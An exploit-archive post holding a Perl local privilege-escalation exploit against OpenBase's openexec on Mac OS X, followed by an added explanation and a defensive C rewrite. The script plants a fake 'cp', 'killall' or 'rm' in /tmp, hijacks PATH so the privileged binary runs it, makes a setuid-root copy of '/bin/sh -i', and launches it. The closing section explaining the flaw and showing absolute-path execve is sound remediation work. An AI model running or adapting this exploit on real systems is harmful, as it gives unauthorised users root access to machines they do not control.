Xcode OpenBase <= 10.0.0 (unsafe system call) Local Root Exploit (OSX)
Source: http://www.digitalmunition.com  Author: kf  Published: 2006-11-09

#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# <= ftp://www.openbase.com/pub/OpenBase_10.0 (vulnerable) ?
#
# This is some fairly blatant and retarded use of system()
#
# cd cp chmod chown rm mkdir and killall appear as strings in the binary hrmm can you say system() !
# -restart -MachLaunch -launch -noexit -install_plugins -kill -install -uninstall and -deactivate all
# *may* be used to trigger these issues.
#
# I don't feel like seeing which flags call which binaries... just 3 is plenty to prove the point.
#
# Tested against OpenBase10.0.0_MacOSX.dmg

$binpath = "/Library/OpenBase/bin/openexec"; # Typical location.

$tgts{"0"} = "cp:$binpath -install";
$tgts{"1"} = "killall:$binpath -kill";
$tgts{"2"} = "rm:$binpath -uninstall";

unless (($target) = @ARGV) {
    print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

    foreach $key (sort(keys %tgts)) {
        ($a,$b) = split(/\:/,$tgts{"$key"});
        print "\t$key . $a - $b\n";
    }

    print "\n";
    exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a - $b\n";

open(OP,">/tmp/finisterre.c");
printf OP "main()\n";
printf OP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"chown root: /tmp/pwns ; chmod 4775 /tmp/pwns\"); }\n";

open(OP,">/tmp/pwns.c");
printf OP "main()\n";
printf OP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"/bin/sh -i\"); }\n";

system("gcc -o /tmp/finisterre /tmp/finisterre.c");
system("gcc -o /tmp/pwns /tmp/pwns.c");

system("echo /bin/cp /tmp/finisterre /tmp/$a");
system("/bin/cp /tmp/finisterre /tmp/$a");

system("export PATH=/tmp:\$PATH; $b");
system("/tmp/pwns");
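
The script's comments attribute the issue to a privileged binary passing bare command names (cp, killall, rm) to system(), which resolves them through the caller's PATH. The corrected pattern, as an added example that is not OpenBase code or part of the original script: the helper is named by absolute path and executed without a shell, with a fixed environment. `run_helper`, `CLEAN_ENV` and the PATH value are assumptions chosen for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for every helper (assumed value): the caller's PATH
 * and any other inherited variable never reach the child. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Hypothetical replacement for system("cp ...") in a privileged program:
 * no shell, no PATH search, no inherited environment.
 * Returns the helper's exit status, or -1 on refusal or failure. */
int run_helper(const char *abs_path, char *const argv[])
{
    if (abs_path == NULL || abs_path[0] != '/') {
        errno = EINVAL;      /* a bare name would need a PATH lookup */
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, CLEAN_ENV);  /* execve never consults PATH */
        _exit(127);                         /* exec failed */
    }
    int status;
    while (waitpid(pid, &status, 0) < 0) {
        if (errno != EINTR)
            return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed scenario: the caller puts a writable directory first.
     * /bin/sh is used here only as a probe to print what the child sees. */
    setenv("PATH", "/tmp:/usr/bin:/bin", 1);
    char *const probe[] = { "sh", "-c", "echo \"helper PATH=$PATH\"", NULL };
    printf("absolute path -> %d\n", run_helper("/bin/sh", probe));
    printf("bare name     -> %d\n", run_helper("cp", probe));
    return 0;
}
```

The helper still runs with the caller's privileges, so the absolute path it names must itself be writable only by root.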